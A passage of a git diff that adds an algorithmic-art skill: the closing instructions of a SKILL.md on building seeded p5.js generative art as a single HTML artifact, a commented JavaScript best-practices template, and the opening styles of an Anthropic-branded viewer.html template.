- ❌ Creating HTML from scratch
|
||||||
|
- ❌ Inventing custom styling or color schemes
|
||||||
|
- ❌ Using system fonts or dark themes
|
||||||
|
- ❌ Changing the sidebar structure
|
||||||
|
|
||||||
|
**Follow these practices:**
|
||||||
|
- ✅ Copy the template's exact HTML structure
|
||||||
|
- ✅ Keep Anthropic branding (Poppins/Lora fonts, light colors, gradient backdrop)
|
||||||
|
- ✅ Maintain the sidebar layout (Seed → Parameters → Colors? → Actions)
|
||||||
|
- ✅ Replace only the p5.js algorithm and parameter controls
|
||||||
|
|
||||||
|
The template is the foundation. Build on it, don't rebuild it.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
To create gallery-quality computational art that lives and breathes, use the algorithmic philosophy as the foundation.
|
||||||
|
|
||||||
|
### TECHNICAL REQUIREMENTS
|
||||||
|
|
||||||
|
**Seeded Randomness (Art Blocks Pattern)**:
|
||||||
|
```javascript
|
||||||
|
// ALWAYS use a seed for reproducibility
|
||||||
|
let seed = 12345; // or hash from user input
|
||||||
|
randomSeed(seed);
|
||||||
|
noiseSeed(seed);
|
||||||
|
```
|
||||||
|
|
||||||
|
**Parameter Structure - FOLLOW THE PHILOSOPHY**:
|
||||||
|
|
||||||
|
To establish parameters that emerge naturally from the algorithmic philosophy, consider: "What qualities of this system can be adjusted?"
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
let params = {
|
||||||
|
seed: 12345, // Always include seed for reproducibility
|
||||||
|
// colors
|
||||||
|
// Add parameters that control YOUR algorithm:
|
||||||
|
// - Quantities (how many?)
|
||||||
|
// - Scales (how big? how fast?)
|
||||||
|
// - Probabilities (how likely?)
|
||||||
|
// - Ratios (what proportions?)
|
||||||
|
// - Angles (what direction?)
|
||||||
|
// - Thresholds (when does behavior change?)
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
|
**To design effective parameters, focus on the properties the system needs to be tunable rather than thinking in terms of "pattern types".**
|
||||||
|
|
||||||
|
**Core Algorithm - EXPRESS THE PHILOSOPHY**:
|
||||||
|
|
||||||
|
**CRITICAL**: The algorithmic philosophy should dictate what to build.
|
||||||
|
|
||||||
|
To express the philosophy through code, avoid thinking "which pattern should I use?" and instead think "how to express this philosophy through code?"
|
||||||
|
|
||||||
|
If the philosophy is about **organic emergence**, consider using:
|
||||||
|
- Elements that accumulate or grow over time
|
||||||
|
- Random processes constrained by natural rules
|
||||||
|
- Feedback loops and interactions
|
||||||
|
|
||||||
|
If the philosophy is about **mathematical beauty**, consider using:
|
||||||
|
- Geometric relationships and ratios
|
||||||
|
- Trigonometric functions and harmonics
|
||||||
|
- Precise calculations creating unexpected patterns
|
||||||
|
|
||||||
|
If the philosophy is about **controlled chaos**, consider using:
|
||||||
|
- Random variation within strict boundaries
|
||||||
|
- Bifurcation and phase transitions
|
||||||
|
- Order emerging from disorder
|
||||||
|
|
||||||
|
**The algorithm flows from the philosophy, not from a menu of options.**
|
||||||
|
|
||||||
|
To guide the implementation, let the conceptual essence inform creative and original choices. Build something that expresses the vision for this particular request.
|
||||||
|
|
||||||
|
**Canvas Setup**: Standard p5.js structure:
|
||||||
|
```javascript
|
||||||
|
function setup() {
|
||||||
|
createCanvas(1200, 1200);
|
||||||
|
// Initialize your system
|
||||||
|
}
|
||||||
|
|
||||||
|
function draw() {
|
||||||
|
// Your generative algorithm
|
||||||
|
// Can be static (noLoop) or animated
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### CRAFTSMANSHIP REQUIREMENTS
|
||||||
|
|
||||||
|
**CRITICAL**: To achieve mastery, create algorithms that feel like they emerged through countless iterations by a master generative artist. Tune every parameter carefully. Ensure every pattern emerges with purpose. This is NOT random noise - this is CONTROLLED CHAOS refined through deep expertise.
|
||||||
|
|
||||||
|
- **Balance**: Complexity without visual noise, order without rigidity
|
||||||
|
- **Color Harmony**: Thoughtful palettes, not random RGB values
|
||||||
|
- **Composition**: Even in randomness, maintain visual hierarchy and flow
|
||||||
|
- **Performance**: Smooth execution, optimized for real-time if animated
|
||||||
|
- **Reproducibility**: Same seed ALWAYS produces identical output
|
||||||
|
|
||||||
|
### OUTPUT FORMAT
|
||||||
|
|
||||||
|
Output:
|
||||||
|
1. **Algorithmic Philosophy** - As markdown or text explaining the generative aesthetic
|
||||||
|
2. **Single HTML Artifact** - Self-contained interactive generative art built from `templates/viewer.html` (see STEP 0 and next section)
|
||||||
|
|
||||||
|
The HTML artifact contains everything: p5.js (from CDN), the algorithm, parameter controls, and UI - all in one file that works immediately in claude.ai artifacts or any browser. Start from the template file, not from scratch.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## INTERACTIVE ARTIFACT CREATION
|
||||||
|
|
||||||
|
**REMINDER: `templates/viewer.html` should have already been read (see STEP 0). Use that file as the starting point.**
|
||||||
|
|
||||||
|
To allow exploration of the generative art, create a single, self-contained HTML artifact. Ensure this artifact works immediately in claude.ai or any browser - no setup required. Embed everything inline.
|
||||||
|
|
||||||
|
### CRITICAL: WHAT'S FIXED VS VARIABLE
|
||||||
|
|
||||||
|
The `templates/viewer.html` file is the foundation. It contains the exact structure and styling needed.
|
||||||
|
|
||||||
|
**FIXED (always include exactly as shown):**
|
||||||
|
- Layout structure (header, sidebar, main canvas area)
|
||||||
|
- Anthropic branding (UI colors, fonts, gradients)
|
||||||
|
- Seed section in sidebar:
|
||||||
|
- Seed display
|
||||||
|
- Previous/Next buttons
|
||||||
|
- Random button
|
||||||
|
- Jump to seed input + Go button
|
||||||
|
- Actions section in sidebar:
|
||||||
|
- Regenerate button
|
||||||
|
- Reset button
|
||||||
|
|
||||||
|
**VARIABLE (customize for each artwork):**
|
||||||
|
- The entire p5.js algorithm (setup/draw/classes)
|
||||||
|
- The parameters object (define what the art needs)
|
||||||
|
- The Parameters section in sidebar:
|
||||||
|
- Number of parameter controls
|
||||||
|
- Parameter names
|
||||||
|
- Min/max/step values for sliders
|
||||||
|
- Control types (sliders, inputs, etc.)
|
||||||
|
- Colors section (optional):
|
||||||
|
- Some art needs color pickers
|
||||||
|
- Some art might use fixed colors
|
||||||
|
- Some art might be monochrome (no color controls needed)
|
||||||
|
- Decide based on the art's needs
|
||||||
|
|
||||||
|
**Every artwork should have unique parameters and algorithm!** The fixed parts provide consistent UX - everything else expresses the unique vision.
|
||||||
|
|
||||||
|
### REQUIRED FEATURES
|
||||||
|
|
||||||
|
**1. Parameter Controls**
|
||||||
|
- Sliders for numeric parameters (particle count, noise scale, speed, etc.)
|
||||||
|
- Color pickers for palette colors
|
||||||
|
- Real-time updates when parameters change
|
||||||
|
- Reset button to restore defaults
|
||||||
|
|
||||||
|
**2. Seed Navigation**
|
||||||
|
- Display current seed number
|
||||||
|
- "Previous" and "Next" buttons to cycle through seeds
|
||||||
|
- "Random" button for random seed
|
||||||
|
- Input field to jump to specific seed
|
||||||
|
- Generate 100 variations when requested (seeds 1-100)
|
||||||
|
|
||||||
|
**3. Single Artifact Structure**
|
||||||
|
```html
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<!-- p5.js from CDN - always available -->
|
||||||
|
<script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
|
||||||
|
<style>
|
||||||
|
/* All styling inline - clean, minimal */
|
||||||
|
/* Canvas on top, controls below */
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<div id="canvas-container"></div>
|
||||||
|
<div id="controls">
|
||||||
|
<!-- All parameter controls -->
|
||||||
|
</div>
|
||||||
|
<script>
|
||||||
|
// ALL p5.js code inline here
|
||||||
|
// Parameter objects, classes, functions
|
||||||
|
// setup() and draw()
|
||||||
|
// UI handlers
|
||||||
|
// Everything self-contained
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
|
**CRITICAL**: This is a single artifact. No external files, no imports (except p5.js CDN). Everything inline.
|
||||||
|
|
||||||
|
**4. Implementation Details - BUILD THE SIDEBAR**
|
||||||
|
|
||||||
|
The sidebar structure:
|
||||||
|
|
||||||
|
**1. Seed (FIXED)** - Always include exactly as shown:
|
||||||
|
- Seed display
|
||||||
|
- Prev/Next/Random/Jump buttons
|
||||||
|
|
||||||
|
**2. Parameters (VARIABLE)** - Create controls for the art:
|
||||||
|
```html
|
||||||
|
<div class="control-group">
|
||||||
|
<label>Parameter Name</label>
|
||||||
|
<input type="range" id="param" min="..." max="..." step="..." value="..." oninput="updateParam('param', this.value)">
|
||||||
|
<span class="value-display" id="param-value">...</span>
|
||||||
|
</div>
|
||||||
|
```
|
||||||
|
Add as many control-group divs as there are parameters.
|
||||||
|
|
||||||
|
**3. Colors (OPTIONAL/VARIABLE)** - Include if the art needs adjustable colors:
|
||||||
|
- Add color pickers if users should control palette
|
||||||
|
- Skip this section if the art uses fixed colors
|
||||||
|
- Skip if the art is monochrome
|
||||||
|
|
||||||
|
**4. Actions (FIXED)** - Always include exactly as shown:
|
||||||
|
- Regenerate button
|
||||||
|
- Reset button
|
||||||
|
- Download PNG button
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
- Seed controls must work (prev/next/random/jump/display)
|
||||||
|
- All parameters must have UI controls
|
||||||
|
- Regenerate, Reset, Download buttons must work
|
||||||
|
- Keep Anthropic branding (UI styling, not art colors)
|
||||||
|
|
||||||
|
### USING THE ARTIFACT
|
||||||
|
|
||||||
|
The HTML artifact works immediately:
|
||||||
|
1. **In claude.ai**: Displayed as an interactive artifact - runs instantly
|
||||||
|
2. **As a file**: Save and open in any browser - no server needed
|
||||||
|
3. **Sharing**: Send the HTML file - it's completely self-contained
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## VARIATIONS & EXPLORATION
|
||||||
|
|
||||||
|
The artifact includes seed navigation by default (prev/next/random buttons), allowing users to explore variations without creating multiple files. If the user wants specific variations highlighted:
|
||||||
|
|
||||||
|
- Include seed presets (buttons for "Variation 1: Seed 42", "Variation 2: Seed 127", etc.)
|
||||||
|
- Add a "Gallery Mode" that shows thumbnails of multiple seeds side-by-side
|
||||||
|
- All within the same single artifact
|
||||||
|
|
||||||
|
This is like creating a series of prints from the same plate - the algorithm is consistent, but each seed reveals different facets of its potential. The interactive nature means users discover their own favorites by exploring the seed space.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## THE CREATIVE PROCESS
|
||||||
|
|
||||||
|
**User request** → **Algorithmic philosophy** → **Implementation**
|
||||||
|
|
||||||
|
Each request is unique. The process involves:
|
||||||
|
|
||||||
|
1. **Interpret the user's intent** - What aesthetic is being sought?
|
||||||
|
2. **Create an algorithmic philosophy** (4-6 paragraphs) describing the computational approach
|
||||||
|
3. **Implement it in code** - Build the algorithm that expresses this philosophy
|
||||||
|
4. **Design appropriate parameters** - What should be tunable?
|
||||||
|
5. **Build matching UI controls** - Sliders/inputs for those parameters
|
||||||
|
|
||||||
|
**The constants**:
|
||||||
|
- Anthropic branding (colors, fonts, layout)
|
||||||
|
- Seed navigation (always present)
|
||||||
|
- Self-contained HTML artifact
|
||||||
|
|
||||||
|
**Everything else is variable**:
|
||||||
|
- The algorithm itself
|
||||||
|
- The parameters
|
||||||
|
- The UI controls
|
||||||
|
- The visual outcome
|
||||||
|
|
||||||
|
To achieve the best results, trust creativity and let the philosophy guide the implementation.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## RESOURCES
|
||||||
|
|
||||||
|
This skill includes helpful templates and documentation:
|
||||||
|
|
||||||
|
- **templates/viewer.html**: REQUIRED STARTING POINT for all HTML artifacts.
|
||||||
|
- This is the foundation - contains the exact structure and Anthropic branding
|
||||||
|
- **Keep unchanged**: Layout structure, sidebar organization, Anthropic colors/fonts, seed controls, action buttons
|
||||||
|
- **Replace**: The p5.js algorithm, parameter definitions, and UI controls in Parameters section
|
||||||
|
- The extensive comments in the file mark exactly what to keep vs replace
|
||||||
|
|
||||||
|
- **templates/generator_template.js**: Reference for p5.js best practices and code structure principles.
|
||||||
|
- Shows how to organize parameters, use seeded randomness, structure classes
|
||||||
|
- NOT a pattern menu - use these principles to build unique algorithms
|
||||||
|
- Embed algorithms inline in the HTML artifact (don't create separate .js files)
|
||||||
|
|
||||||
|
**Critical reminder**:
|
||||||
|
- The **template is the STARTING POINT**, not inspiration
|
||||||
|
- The **algorithm is where to create** something unique
|
||||||
|
- Don't copy the flow field example - build what the philosophy demands
|
||||||
|
- But DO keep the exact UI structure and Anthropic branding from the template
|
||||||
223
skills/algorithmic-art/templates/generator_template.js
Normal file
223
skills/algorithmic-art/templates/generator_template.js
Normal file
@@ -0,0 +1,223 @@
|
|||||||
|
/**
|
||||||
|
* ═══════════════════════════════════════════════════════════════════════════
|
||||||
|
* P5.JS GENERATIVE ART - BEST PRACTICES
|
||||||
|
* ═══════════════════════════════════════════════════════════════════════════
|
||||||
|
*
|
||||||
|
* This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
|
||||||
|
* It does NOT prescribe what art you should create.
|
||||||
|
*
|
||||||
|
* Your algorithmic philosophy should guide what you build.
|
||||||
|
* These are just best practices for how to structure your code.
|
||||||
|
*
|
||||||
|
* ═══════════════════════════════════════════════════════════════════════════
|
||||||
|
*/
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 1. PARAMETER ORGANIZATION
|
||||||
|
// ============================================================================
|
||||||
|
// Keep all tunable parameters in one object
|
||||||
|
// This makes it easy to:
|
||||||
|
// - Connect to UI controls
|
||||||
|
// - Reset to defaults
|
||||||
|
// - Serialize/save configurations
|
||||||
|
|
||||||
|
let params = {
|
||||||
|
// Define parameters that match YOUR algorithm
|
||||||
|
// Examples (customize for your art):
|
||||||
|
// - Counts: how many elements (particles, circles, branches, etc.)
|
||||||
|
// - Scales: size, speed, spacing
|
||||||
|
// - Probabilities: likelihood of events
|
||||||
|
// - Angles: rotation, direction
|
||||||
|
// - Colors: palette arrays
|
||||||
|
|
||||||
|
seed: 12345,
|
||||||
|
// define colorPalette as an array -- choose whatever colors you'd like ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5']
|
||||||
|
// Add YOUR parameters here based on your algorithm
|
||||||
|
};
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 2. SEEDED RANDOMNESS (Critical for reproducibility)
|
||||||
|
// ============================================================================
|
||||||
|
// ALWAYS use seeded random for Art Blocks-style reproducible output
|
||||||
|
|
||||||
|
function initializeSeed(seed) {
|
||||||
|
randomSeed(seed);
|
||||||
|
noiseSeed(seed);
|
||||||
|
// Now all random() and noise() calls will be deterministic
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 3. P5.JS LIFECYCLE
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
function setup() {
|
||||||
|
createCanvas(800, 800);
|
||||||
|
|
||||||
|
// Initialize seed first
|
||||||
|
initializeSeed(params.seed);
|
||||||
|
|
||||||
|
// Set up your generative system
|
||||||
|
// This is where you initialize:
|
||||||
|
// - Arrays of objects
|
||||||
|
// - Grid structures
|
||||||
|
// - Initial positions
|
||||||
|
// - Starting states
|
||||||
|
|
||||||
|
// For static art: call noLoop() at the end of setup
|
||||||
|
// For animated art: let draw() keep running
|
||||||
|
}
|
||||||
|
|
||||||
|
function draw() {
|
||||||
|
// Option 1: Static generation (runs once, then stops)
|
||||||
|
// - Generate everything in setup()
|
||||||
|
// - Call noLoop() in setup()
|
||||||
|
// - draw() doesn't do much or can be empty
|
||||||
|
|
||||||
|
// Option 2: Animated generation (continuous)
|
||||||
|
// - Update your system each frame
|
||||||
|
// - Common patterns: particle movement, growth, evolution
|
||||||
|
// - Can optionally call noLoop() after N frames
|
||||||
|
|
||||||
|
// Option 3: User-triggered regeneration
|
||||||
|
// - Use noLoop() by default
|
||||||
|
// - Call redraw() when parameters change
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 4. CLASS STRUCTURE (When you need objects)
|
||||||
|
// ============================================================================
|
||||||
|
// Use classes when your algorithm involves multiple entities
|
||||||
|
// Examples: particles, agents, cells, nodes, etc.
|
||||||
|
|
||||||
|
class Entity {
|
||||||
|
constructor() {
|
||||||
|
// Initialize entity properties
|
||||||
|
// Use random() here - it will be seeded
|
||||||
|
}
|
||||||
|
|
||||||
|
update() {
|
||||||
|
// Update entity state
|
||||||
|
// This might involve:
|
||||||
|
// - Physics calculations
|
||||||
|
// - Behavioral rules
|
||||||
|
// - Interactions with neighbors
|
||||||
|
}
|
||||||
|
|
||||||
|
display() {
|
||||||
|
// Render the entity
|
||||||
|
// Keep rendering logic separate from update logic
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 5. PERFORMANCE CONSIDERATIONS
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
// For large numbers of elements:
|
||||||
|
// - Pre-calculate what you can
|
||||||
|
// - Use simple collision detection (spatial hashing if needed)
|
||||||
|
// - Limit expensive operations (sqrt, trig) when possible
|
||||||
|
// - Consider using p5 vectors efficiently
|
||||||
|
|
||||||
|
// For smooth animation:
|
||||||
|
// - Aim for 60fps
|
||||||
|
// - Profile if things are slow
|
||||||
|
// - Consider reducing particle counts or simplifying calculations
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 6. UTILITY FUNCTIONS
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
// Color utilities
|
||||||
|
function hexToRgb(hex) {
|
||||||
|
const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
|
||||||
|
return result ? {
|
||||||
|
r: parseInt(result[1], 16),
|
||||||
|
g: parseInt(result[2], 16),
|
||||||
|
b: parseInt(result[3], 16)
|
||||||
|
} : null;
|
||||||
|
}
|
||||||
|
|
||||||
|
function colorFromPalette(index) {
|
||||||
|
return params.colorPalette[index % params.colorPalette.length];
|
||||||
|
}
|
||||||
|
|
||||||
|
// Mapping and easing
|
||||||
|
function mapRange(value, inMin, inMax, outMin, outMax) {
|
||||||
|
return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
|
||||||
|
}
|
||||||
|
|
||||||
|
function easeInOutCubic(t) {
|
||||||
|
return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Constrain to bounds
|
||||||
|
function wrapAround(value, max) {
|
||||||
|
if (value < 0) return max;
|
||||||
|
if (value > max) return 0;
|
||||||
|
return value;
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 7. PARAMETER UPDATES (Connect to UI)
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
function updateParameter(paramName, value) {
|
||||||
|
params[paramName] = value;
|
||||||
|
// Decide if you need to regenerate or just update
|
||||||
|
// Some params can update in real-time, others need full regeneration
|
||||||
|
}
|
||||||
|
|
||||||
|
function regenerate() {
|
||||||
|
// Reinitialize your generative system
|
||||||
|
// Useful when parameters change significantly
|
||||||
|
initializeSeed(params.seed);
|
||||||
|
// Then regenerate your system
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 8. COMMON P5.JS PATTERNS
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
// Drawing with transparency for trails/fading
|
||||||
|
function fadeBackground(opacity) {
|
||||||
|
fill(250, 249, 245, opacity); // Anthropic light with alpha
|
||||||
|
noStroke();
|
||||||
|
rect(0, 0, width, height);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Using noise for organic variation
|
||||||
|
function getNoiseValue(x, y, scale = 0.01) {
|
||||||
|
return noise(x * scale, y * scale);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Creating vectors from angles
|
||||||
|
function vectorFromAngle(angle, magnitude = 1) {
|
||||||
|
return createVector(cos(angle), sin(angle)).mult(magnitude);
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// 9. EXPORT FUNCTIONS
|
||||||
|
// ============================================================================
|
||||||
|
|
||||||
|
function exportImage() {
|
||||||
|
saveCanvas('generative-art-' + params.seed, 'png');
|
||||||
|
}
|
||||||
|
|
||||||
|
// ============================================================================
|
||||||
|
// REMEMBER
|
||||||
|
// ============================================================================
|
||||||
|
//
|
||||||
|
// These are TOOLS and PRINCIPLES, not a recipe.
|
||||||
|
// Your algorithmic philosophy should guide WHAT you create.
|
||||||
|
// This structure helps you create it WELL.
|
||||||
|
//
|
||||||
|
// Focus on:
|
||||||
|
// - Clean, readable code
|
||||||
|
// - Parameterized for exploration
|
||||||
|
// - Seeded for reproducibility
|
||||||
|
// - Performant execution
|
||||||
|
//
|
||||||
|
// The art itself is entirely up to you!
|
||||||
|
//
|
||||||
|
// ============================================================================
|
||||||
599
skills/algorithmic-art/templates/viewer.html
Normal file
599
skills/algorithmic-art/templates/viewer.html
Normal file
@@ -0,0 +1,599 @@
|
|||||||
|
<!DOCTYPE html>
|
||||||
|
<!--
|
||||||
|
THIS IS A TEMPLATE THAT SHOULD BE USED EVERY TIME AND MODIFIED.
|
||||||
|
WHAT TO KEEP:
|
||||||
|
✓ Overall structure (header, sidebar, main content)
|
||||||
|
✓ Anthropic branding (colors, fonts, layout)
|
||||||
|
✓ Seed navigation section (always include this)
|
||||||
|
✓ Self-contained artifact (everything inline)
|
||||||
|
|
||||||
|
WHAT TO CREATIVELY EDIT:
|
||||||
|
✗ The p5.js algorithm (implement YOUR vision)
|
||||||
|
✗ The parameters (define what YOUR art needs)
|
||||||
|
✗ The UI controls (match YOUR parameters)
|
||||||
|
|
||||||
|
Let your philosophy guide the implementation.
|
||||||
|
The world is your oyster - be creative!
|
||||||
|
-->
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||||
|
<title>Generative Art Viewer</title>
|
||||||
|
<script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
|
||||||
|
<link rel="preconnect" href="https://fonts.googleapis.com">
|
||||||
|
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
|
||||||
|
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&family=Lora:wght@400;500&display=swap" rel="stylesheet">
|
||||||
|
<style>
|
||||||
|
/* Anthropic Brand Colors */
|
||||||
|
:root {
|
||||||
|
--anthropic-dark: #141413;
|
||||||
|
--anthropic-light: #faf9f5;
|
||||||
|
--anthropic-mid-gray: #b0aea5;
|
||||||
|
--anthropic-light-gray: #e8e6dc;
|
||||||
|
--anthropic-orange: #d97757;
|
||||||
|
--anthropic-blue: #6a9bcc;
|
||||||
|
--anthropic-green: #788c5d;
|
||||||
|
}
|
||||||
|
|
||||||
|
* {
|
||||||
|
margin: 0;
|
||||||
|
padding: 0;
|
||||||
|
box-sizing: border-box;
|
||||||
|
}
|
||||||
|
|
||||||
|
body {
|
||||||
|
font-family: 'Poppins', sans-serif;
|
||||||
|
background: linear-gradient(135deg, var(--anthropic-light) 0%, #f5f3ee 100%);
|
||||||
|
min-height: 100vh;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
}
|
||||||
|
|
||||||
|
.container {
|
||||||
|
display: flex;
|
||||||
|
min-height: 100vh;
|
||||||
|
padding: 20px;
|
||||||
|
gap: 20px;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Sidebar */
|
||||||
|
.sidebar {
|
||||||
|
width: 320px;
|
||||||
|
flex-shrink: 0;
|
||||||
|
background: rgba(255, 255, 255, 0.95);
|
||||||
|
backdrop-filter: blur(10px);
|
||||||
|
padding: 24px;
|
||||||
|
border-radius: 12px;
|
||||||
|
box-shadow: 0 10px 30px rgba(20, 20, 19, 0.1);
|
||||||
|
overflow-y: auto;
|
||||||
|
overflow-x: hidden;
|
||||||
|
}
|
||||||
|
|
||||||
|
.sidebar h1 {
|
||||||
|
font-family: 'Lora', serif;
|
||||||
|
font-size: 24px;
|
||||||
|
font-weight: 500;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.sidebar .subtitle {
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
font-size: 14px;
|
||||||
|
margin-bottom: 32px;
|
||||||
|
line-height: 1.4;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Control Sections */
|
||||||
|
.control-section {
|
||||||
|
margin-bottom: 32px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-section h3 {
|
||||||
|
font-size: 16px;
|
||||||
|
font-weight: 600;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 16px;
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
gap: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-section h3::before {
|
||||||
|
content: '•';
|
||||||
|
color: var(--anthropic-orange);
|
||||||
|
font-weight: bold;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Seed Controls */
|
||||||
|
.seed-input {
|
||||||
|
width: 100%;
|
||||||
|
background: var(--anthropic-light);
|
||||||
|
padding: 12px;
|
||||||
|
border-radius: 8px;
|
||||||
|
font-family: 'Courier New', monospace;
|
||||||
|
font-size: 14px;
|
||||||
|
margin-bottom: 12px;
|
||||||
|
border: 1px solid var(--anthropic-light-gray);
|
||||||
|
text-align: center;
|
||||||
|
}
|
||||||
|
|
||||||
|
.seed-input:focus {
|
||||||
|
outline: none;
|
||||||
|
border-color: var(--anthropic-orange);
|
||||||
|
box-shadow: 0 0 0 2px rgba(217, 119, 87, 0.1);
|
||||||
|
background: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
.seed-controls {
|
||||||
|
display: grid;
|
||||||
|
grid-template-columns: 1fr 1fr;
|
||||||
|
gap: 8px;
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.regen-button {
|
||||||
|
margin-bottom: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Parameter Controls */
|
||||||
|
.control-group {
|
||||||
|
margin-bottom: 20px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-group label {
|
||||||
|
display: block;
|
||||||
|
font-size: 14px;
|
||||||
|
font-weight: 500;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container {
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
gap: 12px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"] {
|
||||||
|
flex: 1;
|
||||||
|
height: 4px;
|
||||||
|
background: var(--anthropic-light-gray);
|
||||||
|
border-radius: 2px;
|
||||||
|
outline: none;
|
||||||
|
-webkit-appearance: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-webkit-slider-thumb {
|
||||||
|
-webkit-appearance: none;
|
||||||
|
width: 16px;
|
||||||
|
height: 16px;
|
||||||
|
background: var(--anthropic-orange);
|
||||||
|
border-radius: 50%;
|
||||||
|
cursor: pointer;
|
||||||
|
transition: all 0.2s ease;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-webkit-slider-thumb:hover {
|
||||||
|
transform: scale(1.1);
|
||||||
|
background: #c86641;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-moz-range-thumb {
|
||||||
|
width: 16px;
|
||||||
|
height: 16px;
|
||||||
|
background: var(--anthropic-orange);
|
||||||
|
border-radius: 50%;
|
||||||
|
border: none;
|
||||||
|
cursor: pointer;
|
||||||
|
transition: all 0.2s ease;
|
||||||
|
}
|
||||||
|
|
||||||
|
.value-display {
|
||||||
|
font-family: 'Courier New', monospace;
|
||||||
|
font-size: 12px;
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
min-width: 60px;
|
||||||
|
text-align: right;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Color Pickers */
|
||||||
|
.color-group {
|
||||||
|
margin-bottom: 16px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.color-group label {
|
||||||
|
display: block;
|
||||||
|
font-size: 12px;
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
margin-bottom: 4px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.color-picker-container {
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
gap: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.color-picker-container input[type="color"] {
|
||||||
|
width: 32px;
|
||||||
|
height: 32px;
|
||||||
|
border: none;
|
||||||
|
border-radius: 6px;
|
||||||
|
cursor: pointer;
|
||||||
|
background: none;
|
||||||
|
padding: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
.color-value {
|
||||||
|
font-family: 'Courier New', monospace;
|
||||||
|
font-size: 12px;
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Buttons */
|
||||||
|
.button {
|
||||||
|
background: var(--anthropic-orange);
|
||||||
|
color: white;
|
||||||
|
border: none;
|
||||||
|
padding: 10px 16px;
|
||||||
|
border-radius: 6px;
|
||||||
|
font-size: 14px;
|
||||||
|
font-weight: 500;
|
||||||
|
cursor: pointer;
|
||||||
|
transition: all 0.2s ease;
|
||||||
|
width: 100%;
|
||||||
|
}
|
||||||
|
|
||||||
|
.button:hover {
|
||||||
|
background: #c86641;
|
||||||
|
transform: translateY(-1px);
|
||||||
|
}
|
||||||
|
|
||||||
|
.button:active {
|
||||||
|
transform: translateY(0);
|
||||||
|
}
|
